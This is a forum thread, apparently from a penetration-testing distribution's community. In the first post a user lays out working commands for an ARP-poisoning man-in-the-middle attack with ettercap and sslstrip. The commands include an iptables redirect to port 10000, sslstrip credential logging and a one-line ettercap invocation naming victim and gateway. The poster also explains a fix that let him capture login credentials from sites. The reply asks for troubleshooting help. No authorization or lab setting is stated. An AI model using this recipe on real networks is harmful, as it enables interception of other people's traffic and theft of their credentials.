Results 1 to 2 of 2

Thread: Issue with sslstrip and ettercap (Mitm attacks) (SOLVED)

  1. #1
    Just burned their ISO
    Join Date
    Dec 2012
    Posts
    1

    Default Issue with sslstrip and ettercap (Mitm attacks) (SOLVED)

    I've been scratching my head the last few days and finally found the answer to why I wasn't getting credentials to logins at sites.
    A LOT of videos and how-to write ups for ettercap and sslstrip and everyone seems to say something different. I have to give credit to Maverick35 for leading me in this direction to find the answer
    Other sites I've been to say to do the following (ex.):

    #Open Terminal
    #Redirects requests on port 80 to sslstrip running on port 10000
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000]
    echo "1" > /proc/sys/net/ipv4/ip_forward
    #You can check the forwarding if you want by typing:
    cat /proc/sys/net/ip_forward
    #You should see a "1" there

    #New Terminal

    #Run sslstrip logging on port 10000
    sslstrip -p -f
    #I use -p for log only SSL Posts. -f substitutes a lock favicon on secure requests

    #(Optional) You can monitor the log
    tail -F sslstrip.log
    #Launch ettercap gui with packet dump
    ettercap -G -w ~/ettercap_packets.pcap
    #In Ettercap enter unified sniffing
    Sniff->Unified Sniffing
    #Select your interface
    wlan0 (example)
    #Scan for hosts
    Hosts->Scan for hosts
    #View hosts list for scan
    Hosts->Hosts list
    #Select Targets
    Highlight the victim -> Add to Target 1
    Highlight the victim -> Add to Target 2
    #View the added targets
    Targets -> Current Targets
    #Perform Arp poisoning (Mitm attack) on targets
    Mitm -> Arp Poisoning (Sniff remote connections)
    #Start
    Start -> Start Sniffing
    This was giving me no love here. If you man ettercap you will see that ettercap already does the forwarding for you (/proc/sys/net/ipv4/ip_forward) so there is no need to do it. In fact if you run ettercap after you type in that command it will just set the (/proc/sys/net/ipv4/ip_forward) back to "0" afterwards. Try cat /proc/sys/net/ipv4/ip_forward after running ettercap and you will see it will set the kernel to "0". It describes it in the man page.

    The real issue I was having was with sslstrip. I didn't know it until a little while ago. I wasn't getting credentials on all sites like I was hoping. Come to find out sslstrip (I'm using .9 version) only works with python 2.5 and up. If you look at the sslstrip.py file at gedit /pentest/web/sslstrip/sslstrip.py you will see at the top:

    #!/usr/bin/env python
    #You need to change it to:
    #!/usr/bin/python2.6
    The quickest way to setup everyting for me and have it working is without GUI and just type below:

    iptables -t nat --flush (To flush any added rules to the nat tables)
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sslstrip -p -f (only logging https and uses the Favicon)

    OPEN another terminal:
    ettercap -Tqi "your interface" -M arp:remote /Victim/ /Gateway/ -P autoadd (you can also just do // /Gateway/ , if you want to get all targets)

    Thats it. After that everything was working smooth.

  2. #2
    Just burned his ISO
    Join Date
    Dec 2011
    Posts
    2

    Default Re: Issue with sslstrip and ettercap (Mitm attacks) (SOLVED)

    Hello Altoid. Can you help me in figuring out about a trouble in ettercap usage. I don't get the Attacker (backtrack OS) in list when i scan for hosts. It gives me the Host OS (WIN 07) and my gateway (internet router) in the hosts list. I am using Backtrack in VM Ware with network adapter in bridged mode.

Similar Threads

  1. sslstrip+ettercap yahoo mail issue
    By scorpoin in forum BackTrack 5 General Topics
    Replies: 0
    Last Post: 05-31-2011, 06:10 AM
  2. Replies: 3
    Last Post: 04-04-2011, 12:55 PM
  3. tools for MITM attacks on a VPN tunnels?
    By guitar_adam2000 in forum OLD General IT Discussion
    Replies: 1
    Last Post: 08-15-2009, 04:17 AM
  4. Is it possible to use MITM attacks on 802.1x?
    By Lord MuffloN in forum OLD Wireless
    Replies: 2
    Last Post: 10-06-2008, 12:04 PM
  5. [Solved] VMWare HDD Installation Issue Solved
    By Plasma_GR in forum OLD BackTrack v2.0 Final
    Replies: 0
    Last Post: 05-08-2007, 09:05 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •